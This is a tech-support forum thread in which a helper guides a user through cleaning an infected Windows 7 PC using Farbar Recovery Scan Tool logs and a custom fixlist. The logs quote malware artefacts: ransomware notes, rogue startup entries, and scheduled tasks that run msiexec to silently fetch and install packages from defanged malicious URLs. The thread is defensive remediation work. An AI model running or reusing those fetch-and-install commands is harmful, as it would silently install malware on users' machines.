

Hello and Happy New Year. My problem: Chrome opens slowly, freezes and crashes, and several pages open at once. At the moment I am in Safe Mode; otherwise it freezes.

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-01-2019
Ran by ВЕС (administrator) on WIN-SKFJ6HLGST2 (03-01-2019 20:43:32)
Running from C:\Users\ВЕС\Downloads
Loaded Profiles: ВЕС (Available Profiles: ВЕС)
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Safe Mode (with Networking)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\Run: [DHY0GM3ATCSFE7M] => "C:\Program Files\x0h1djdcnoe\3OQCH.exe"
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize 
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\MountPoints2: {41be252d-0f82-11e9-a624-002713343a56} - F:\Lenovo_Suite.exe
HKLM\...\Drivers32: [MSVideo8] => C:\Windows\system32\VfWWDM32.dll [56832 2010-11-20] (Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [>{60B49E34-C7CC-11D0-8953-00A0C90347FF}] -> C:\Windows\System32\iedkcs32.dll [2010-11-20] (Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\71.0.3578.98\Installer\chrmstp.exe [2019-01-03] (Google Inc.)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{840DEA2A-8553-4D25-A5FB-7DB86C5BFBE5}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{EE11610E-0BCC-42A7-A0AC-89B4A3B92BF1}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/en-xl/?ocid=iehp
SearchScopes: HKU\S-1-5-21-3512987231-521144983-709920193-1000 -> {BDF61FAE-9D19-40F0-8F34-688DEB334CA9} URL = hxxp://securedsearch.lavasoft.com/results.php?pr=vmn&id=webcompa&ent=ch_WCYID10477_754_190103&q={searchTerms}
BHO: YoutubeAdBlock -> {984AFA40-4BEC-457F-AEDE-FE3404A646FA} -> C:\Program Files\VKkhWVSisIE\kwTiXoR.dll => No File

FireFox:
========
FF ProfilePath: C:\Users\ВЕС\AppData\Roaming\K-Meleon\oytl87x0.default [2019-01-03]
FF user.js: detected! => C:\Users\ВЕС\AppData\Roaming\K-Meleon\oytl87x0.default\user.js [2006-04-06]
FF Extension: (NewsFox) - C:\Users\ВЕС\Downloads\k-meleon\browser\extensions\{899DF1F8-2F43-4394-8315-37F6744E6319}.xpi [2016-01-04] [Legacy] [not signed]
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.23\npGoogleUpdate3.dll [No File]
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.23\npGoogleUpdate3.dll [No File]

Chrome: 
=======
CHR HomePage: Default -> hxxp://google.bg/
CHR Profile: C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default [2019-01-03]
CHR Extension: (Lightshot (скрииншот инструмент)) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbniclmhobmnbdlbpiphghaielnnpgdp [2019-01-03]
CHR Extension: (Плащания в уеб магазина на Chrome) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-01-03]
CHR Extension: (Chrome Media Router) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-03]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

"qamplvkj" => service was unlocked. <==== ATTENTION

S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\71.0.3578.98\elevation_service.exe [375776 2018-12-12] (Google Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [5073376 2018-09-19] (Malwarebytes)
S2 qamplvkj; C:\Windows\system32\qamplvkj\dfaricjc.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
S2 gupdate; "C:\Program Files\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files\Google\Update\GoogleUpdate.exe" /medsvc [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [172280 2019-01-03] (Malwarebytes)
S3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [106144 2019-01-03] (Malwarebytes)
S3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [63760 2019-01-03] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [230120 2019-01-03] (Malwarebytes)
S3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [83648 2019-01-03] (Malwarebytes)
U3 TrueSight; \??\C:\Windows\System32\drivers\truesight.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-04 03:15 - 2019-01-04 03:15 - 000001345 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
2019-01-04 03:15 - 2019-01-04 03:15 - 000001326 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
2019-01-04 03:14 - 2019-01-04 03:14 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_09_00.Wdf
2019-01-04 03:10 - 2019-01-03 18:31 - 000000000 ____D C:\Windows\Panther
2019-01-04 03:03 - 2019-01-04 03:03 - 000000000 ____D C:\Windows.old
2019-01-03 20:43 - 2019-01-03 20:43 - 001783808 _____ (Farbar) C:\Users\ВЕС\Downloads\FRST.exe
2019-01-03 20:43 - 2019-01-03 20:43 - 000007564 _____ C:\Users\ВЕС\Downloads\FRST.txt
2019-01-03 20:43 - 2019-01-03 20:43 - 000000000 ____D C:\FRST
2019-01-03 20:18 - 2019-01-03 20:18 - 000106144 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2019-01-03 20:18 - 2019-01-03 20:18 - 000083648 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2019-01-03 20:18 - 2019-01-03 20:18 - 000063760 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2019-01-03 20:03 - 2019-01-03 20:03 - 000000000 ____D C:\Users\ВЕС\AppData\Local\mbam
2019-01-03 20:02 - 2019-01-03 20:42 - 000172280 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2019-01-03 20:02 - 2019-01-03 20:02 - 000230120 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-01-03 20:02 - 2019-01-03 20:02 - 000002020 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\Users\ВЕС\AppData\Local\mbamtray
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\Program Files\Malwarebytes
2019-01-03 20:02 - 2018-12-04 08:09 - 000129248 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae.sys
2019-01-03 20:00 - 2019-01-03 20:01 - 081227760 _____ (Malwarebytes ) C:\Users\ВЕС\Downloads\mb3-setup-consumer-3.6.1.2711-1.0.508-1.0.8211.exe
2019-01-03 19:40 - 2019-01-03 20:03 - 000000000 ____D C:\ProgramData\RogueKiller
2019-01-03 19:40 - 2019-01-03 19:40 - 029162424 _____ (Adlice Software ) C:\Users\ВЕС\Downloads\RogueKiller_setup.exe
2019-01-03 19:40 - 2019-01-03 19:40 - 000001001 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2019-01-03 19:40 - 2019-01-03 19:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2019-01-03 19:40 - 2019-01-03 19:40 - 000000000 ____D C:\Program Files\RogueKiller
2019-01-03 19:34 - 2019-01-03 20:42 - 000265284 _____ C:\Windows\ntbtlog.txt
2019-01-03 19:30 - 2019-01-03 19:30 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\teiqv2gvtfm
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\imgn0qmwmwh
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\acysy1vaoki
2019-01-03 19:10 - 2019-01-03 19:10 - 006161408 _____ C:\Users\ВЕС\AppData\Local\dump007.dat
2019-01-03 19:09 - 2019-01-03 19:09 - 000000009 _____ C:\Users\ВЕС\rstr1.ini
2019-01-03 19:08 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\3zxuksmazmq
2019-01-03 19:07 - 2019-01-03 19:07 - 000000258 __RSH C:\Users\ВЕС\ntuser.pol
2019-01-03 19:04 - 2019-01-03 19:04 - 000000000 ____D C:\Windows\system32\qamplvkj
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\vi5lm2mflim
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\sq0zlve2tqj
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\qc1oa2vrskn
2019-01-03 19:02 - 2019-01-03 19:02 - 000000000 ____D C:\Users\ВЕС\AppData\LocalLow\yHNPHHIzKpsCK
2019-01-03 19:01 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\423viiu5lfu
2019-01-03 19:01 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Michael
2019-01-03 19:01 - 2019-01-03 19:19 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\ShopMore
2019-01-03 19:01 - 2019-01-03 19:07 - 000002964 __RSH C:\ProgramData\ntuser.pol
2019-01-03 19:01 - 2019-01-03 19:01 - 000493800 _____ (VideoDriver) C:\Windows\D04DE5140B2D.sys
2019-01-03 19:01 - 2019-01-03 19:01 - 000140800 _____ C:\Users\ВЕС\AppData\Local\installer.dat
2019-01-03 19:01 - 2019-01-03 19:01 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Python
2019-01-03 19:00 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\ezc3lfxnx4j
2019-01-03 19:00 - 2019-01-03 19:00 - 000000003 _____ C:\Users\ВЕС\AppData\Local\wbem.ini
2019-01-03 19:00 - 2019-01-03 19:00 - 000000000 ____D C:\ProgramData\{AC10FE2E-1A46-0496-3E07-15883EE04CD9}
2019-01-03 19:00 - 2019-01-03 19:00 - 000000000 ____D C:\ProgramData\{59403C6F-D807-F1C6-7FC5-457D7F221C2C}
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\Users\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:57 - 2019-01-03 18:57 - 000000000 ____H C:\d85105b2d85102533b.lock
2019-01-03 18:56 - 2019-01-03 18:56 - 000000000 ____D C:\ProgramData\HCRGWPOIZH4OHCKX91M2
2019-01-03 18:56 - 2015-08-03 08:53 - 000384000 _____ (SafeIP) C:\Windows\system32\SafeIPs.dll
2019-01-03 18:55 - 2019-01-03 20:05 - 000000000 ____D C:\Program Files\KMSPico 10.2.1 Final
2019-01-03 18:53 - 2018-12-10 23:04 - 000499424 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2019-01-03 18:48 - 2019-01-03 18:48 - 001259736 _____ (Plarium) C:\Users\ВЕС\Downloads\PlariumPlaySetup (1).exe
2019-01-03 18:46 - 2019-01-03 18:46 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Package Cache
2019-01-03 18:45 - 2019-01-03 19:03 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Mozilla
2019-01-03 18:45 - 2019-01-03 18:45 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\K-Meleon
2019-01-03 18:45 - 2019-01-03 18:45 - 000000000 ____D C:\Users\ВЕС\AppData\Local\K-Meleon
2019-01-03 18:44 - 2019-01-03 18:44 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Plarium
2019-01-03 18:44 - 2019-01-03 18:44 - 000000000 ____D C:\Users\ВЕС\AppData\Local\CEF
2019-01-03 18:39 - 2019-01-03 18:39 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Google
2019-01-03 18:38 - 2019-01-03 19:53 - 000002202 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-01-03 18:38 - 2019-01-03 19:53 - 000002161 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-01-03 18:37 - 2019-01-03 19:02 - 000000000 ____D C:\Program Files\Google
2019-01-03 18:37 - 2019-01-03 19:00 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Google
2019-01-03 18:37 - 2019-01-03 18:37 - 000057560 _____ C:\Users\ВЕС\AppData\Local\GDIPFONTCACHEV1.DAT
2019-01-03 18:37 - 2019-01-03 18:37 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Deployment
2019-01-03 18:37 - 2019-01-03 18:37 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Apps\2.0
2019-01-03 18:36 - 2014-05-14 17:23 - 001973728 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2019-01-03 18:36 - 2014-05-14 17:23 - 000054240 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2019-01-03 18:36 - 2014-05-14 17:23 - 000045536 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2019-01-03 18:36 - 2014-05-14 17:17 - 002425856 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2019-01-03 18:36 - 2014-05-14 09:23 - 000179656 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2019-01-03 18:36 - 2014-05-14 09:17 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2019-01-03 18:33 - 2019-01-03 19:53 - 000001335 _____ C:\Users\ВЕС\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-01-03 18:33 - 2019-01-03 19:09 - 000000000 ____D C:\Users\ВЕС
2019-01-03 18:33 - 2019-01-03 18:33 - 000000020 ___SH C:\Users\ВЕС\ntuser.ini
2019-01-03 18:33 - 2019-01-03 18:33 - 000000000 ____D C:\Users\ВЕС\AppData\Local\VirtualStore
2019-01-03 18:33 - 2010-11-21 01:46 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Media Center Programs
2019-01-03 16:27 - 2019-01-03 16:27 - 000000000 ____D C:\My Drivers
2018-12-30 08:50 - 2018-12-30 08:50 - 005183296 _____ (Marcin Szeniak ) C:\Users\ВЕС\Downloads\BCUninstaller_4.12.1_setup.exe
2018-12-29 13:35 - 2018-12-29 13:35 - 000000000 ____D C:\SWSetup

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-04 03:15 - 2009-07-14 05:52 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2019-01-04 03:15 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\system32\sysprep
2019-01-04 03:12 - 2010-11-21 01:46 - 000000000 ____D C:\Windows\CSC
2019-01-04 03:10 - 2009-07-14 05:52 - 000028672 _____ C:\Windows\system32\config\BCD-Template
2019-01-03 20:30 - 2010-11-20 22:01 - 000713888 _____ C:\Windows\system32\PerfStringBackup.INI
2019-01-03 20:30 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\inf
2019-01-03 20:18 - 2009-07-14 05:53 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-01-03 20:17 - 2009-07-14 05:34 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-01-03 20:17 - 2009-07-14 05:34 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-01-03 19:01 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\system32\GroupPolicy
2019-01-03 18:57 - 2018-08-11 19:54 - 000000000 ____D C:\Intel
2019-01-03 18:57 - 2017-10-21 13:53 - 000000000 ____D C:\LFS
2019-01-03 18:57 - 2017-09-25 20:50 - 000000000 ___RD C:\BECKO-PC
2019-01-03 18:57 - 2017-04-14 15:10 - 000036892 ____H C:\iCS Source.suo.nybmyxmig
2019-01-03 18:33 - 2009-07-14 05:33 - 000266808 _____ C:\Windows\system32\FNTCACHE.DAT
2019-01-03 18:31 - 2009-07-14 03:37 - 000000000 __RHD C:\Users\Public\Libraries
2019-01-03 17:30 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\rescache
2019-01-03 15:34 - 2018-08-11 14:17 - 000000000 ____D C:\Users\ВЕС\Downloads\k-meleon
2019-01-01 13:09 - 2018-09-02 13:32 - 000000000 ____D C:\Users\ВЕС\Documents\TalkHelper

==================== Files in the root of some directories =======

1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Users\ВЕС\AppData\Local\aIQEonJ.exe
2019-01-03 19:10 - 2019-01-03 19:10 - 006161408 _____ () C:\Users\ВЕС\AppData\Local\dump007.dat
2019-01-03 19:01 - 2019-01-03 19:01 - 000140800 _____ () C:\Users\ВЕС\AppData\Local\installer.dat
2019-01-03 19:00 - 2019-01-03 19:00 - 000000003 _____ () C:\Users\ВЕС\AppData\Local\wbem.ini

Some files in TEMP:
====================
2019-01-03 18:56 - 2019-01-03 18:56 - 000710464 _____ () C:\Users\ВЕС\AppData\Local\Temp\3.exe
2019-01-03 19:00 - 2019-01-03 19:00 - 001312696 _____ (                                                            ) C:\Users\ВЕС\AppData\Local\Temp\fastdatax.exe
2019-01-03 19:09 - 2019-01-03 20:19 - 000000000 ____D () C:\Users\ВЕС\AppData\Local\Temp\IEShims.dll
2019-01-03 19:00 - 2019-01-03 19:00 - 003520512 _____ () C:\Users\ВЕС\AppData\Local\Temp\installer_mi.exe
2019-01-03 18:56 - 2019-01-03 18:56 - 002715792 _____ (SafeIP, LLC.                                                ) C:\Users\ВЕС\AppData\Local\Temp\update.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-01-04 03:11

==================== End of FRST.txt ===========================

Addition.txt

Screenshot.png


Hello..! Your system is infected..! Tomorrow morning I will go through the logs once more and write you a script and further instructions..! Have a good evening..! :)


Thank you, I will be available after 16:30


Hello.. To begin with, run the following script in Safe Mode.. after it has run, try to do new scans in normal mode..!

Fix with Farbar Recovery Scan Tool

Download the attached file fixlist.txt and save it in the same place where you downloaded FRST.exe.
Start FRST.exe again, press the Fix button once and wait.

A new log file, FixLog.txt, will be created. Attach its contents in your next comment.

NOTE: This script was written specifically for this user and for this particular machine. Running the fix on another computer may damage your operating system.

Logs

In your next reply, please include the following logs:

  • FixLog.txt

It has been 1 hour now: "Fixing is in progress please wait"



You are running the script in Safe Mode (with Networking), right....?

 


Yes

Nevertheless, I now see that I have a log file

Fix result of Farbar Recovery Scan Tool (x86) Version: 01-01-2019
Ran by ВЕС (04-01-2019 16:30:36) Run:1
Running from C:\Users\ВЕС\Downloads
Loaded Profiles: ВЕС (Available Profiles: ВЕС)
Boot Mode: Safe Mode (with Networking)

==============================================

fixlist content:
*****************
start
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\Run: [DHY0GM3ATCSFE7M] => "C:\Program Files\x0h1djdcnoe\3OQCH.exe"
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\MountPoints2: {41be252d-0f82-11e9-a624-002713343a56} - F:\Lenovo_Suite.exe
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
SearchScopes: HKU\S-1-5-21-3512987231-521144983-709920193-1000 -> {BDF61FAE-9D19-40F0-8F34-688DEB334CA9} URL = hxxp://securedsearch.lavasoft.com/results.php?pr=vmn&id=webcompa&ent=ch_WCYID10477_754_190103&q={searchTerms}
BHO: YoutubeAdBlock -> {984AFA40-4BEC-457F-AEDE-FE3404A646FA} -> C:\Program Files\VKkhWVSisIE\kwTiXoR.dll => No File
"qamplvkj" => service was unlocked. <==== ATTENTION 
S2 qamplvkj; C:\Windows\system32\qamplvkj\dfaricjc.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\teiqv2gvtfm
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\imgn0qmwmwh
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\acysy1vaoki
2019-01-03 19:08 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\3zxuksmazmq
2019-01-03 19:04 - 2019-01-03 19:04 - 000000000 ____D C:\Windows\system32\qamplvkj
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\vi5lm2mflim
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\sq0zlve2tqj
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\qc1oa2vrskn
2019-01-03 19:02 - 2019-01-03 19:02 - 000000000 ____D C:\Users\ВЕС\AppData\LocalLow\yHNPHHIzKpsCK
2019-01-03 19:01 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\423viiu5lfu
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\Users\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:57 - 2019-01-03 18:57 - 000000000 ____H C:\d85105b2d85102533b.lock
2019-01-03 18:56 - 2019-01-03 18:56 - 000000000 ____D C:\ProgramData\HCRGWPOIZH4OHCKX91M2
C:\Windows\system32\qamplvkj\dfaricjc.exe
Task: {28388CE9-2CA7-49CC-9564-0F424E14BEED} - System32\Tasks\DvwLFWwXutwLxJgmB2 => rundll32 "C:\Program Files\ooxzIAzTqruiVIszQdR\yydPZjO.dll",#1
Task: {56D6A7AF-393C-40E2-9FC4-2A3636BD7188} - System32\Tasks\{EF961BFA-57B7-56F3-7C41-CBDA384B27B1} => "msiexec" -package hxxps://refreshnerer711.info/wVM4raQAo.n1e /q
Task: {7AF01070-CEDB-4440-A34C-665C65F672C1} - System32\Tasks\iYMvCriySoqaGgPjbmR2 => rundll32 "C:\Program Files\qUgzYKxVLnesC\lnFhOtc.dll",#1
Task: {8E82EE52-6E07-47A4-94E6-6615304E8C41} - System32\Tasks\{9691CC12-2E74-1BC2-86C6-CA40BD9675B3} => "msiexec" /q /i hxxps://refreshnerer711rb.info/F01BsF0RBXQ.CrC
Task: {97F429C1-49D9-4EE5-82B4-4FC29549D18B} - System32\Tasks\UXshqEpiPQcXH2 => C:\Windows\system32\wscript.exe "C:\ProgramData\BuHcEEPgNwocAWVB\QkkdFBc.wsf"
Task: {DB69F2CB-FE06-4A26-872B-C008C9CFD1BC} - System32\Tasks\mMzvDpxKxjJVUr => rundll32 "C:\Program Files\hUmbquBpttZU2\mNvKUiXnBbMki.dll",#1
AlternateDataStreams: C:\Windows\system32\config\systemprofile:.repos [6509722]
IE trusted site: HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\webcompanion.com -> hxxp://webcompanion.com
reboot:
end

*****************

Error: Restore point can only be created in normal mode.
Processes closed successfully.
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully.
"HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Windows\CurrentVersion\Run\\DHY0GM3ATCSFE7M" => removed successfully.
"HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Web Companion" => removed successfully.
HKU\S-1-5-21-3512987231-521144983-709920193-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{41be252d-0f82-11e9-a624-002713343a56} => removed successfully.
HKLM\Software\Classes\CLSID\{41be252d-0f82-11e9-a624-002713343a56} => not found
HKLM\SOFTWARE\Policies\Google => removed successfully.
HKU\S-1-5-21-3512987231-521144983-709920193-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9} => removed successfully.
HKLM\Software\Classes\CLSID\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9} => not found
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{984AFA40-4BEC-457F-AEDE-FE3404A646FA} => removed successfully.
HKLM\Software\Classes\CLSID\{984AFA40-4BEC-457F-AEDE-FE3404A646FA} => removed successfully.
"qamplvkj" => service was unlocked. <==== ATTENTION => Error: No automatic fix found for this entry.
 


The whole fix did not run... and I have my suspicions as to why.... Wait a moment while I make a correction...!

Let's see whether it runs now.. again in Safe Mode (with Networking):

Download the attached file fixlist.txt and save it in the same place where you downloaded FRST.exe.
Start FRST.exe again, press the Fix button once and wait.

A new log file, FixLog.txt, will be created. Attach its contents in your next comment.

NOTE: This script was written specifically for this user and for this particular machine. Running the fix on another computer may damage your operating system.

Logs

In your next reply, please include the following logs:

  • FixLog.txt

 


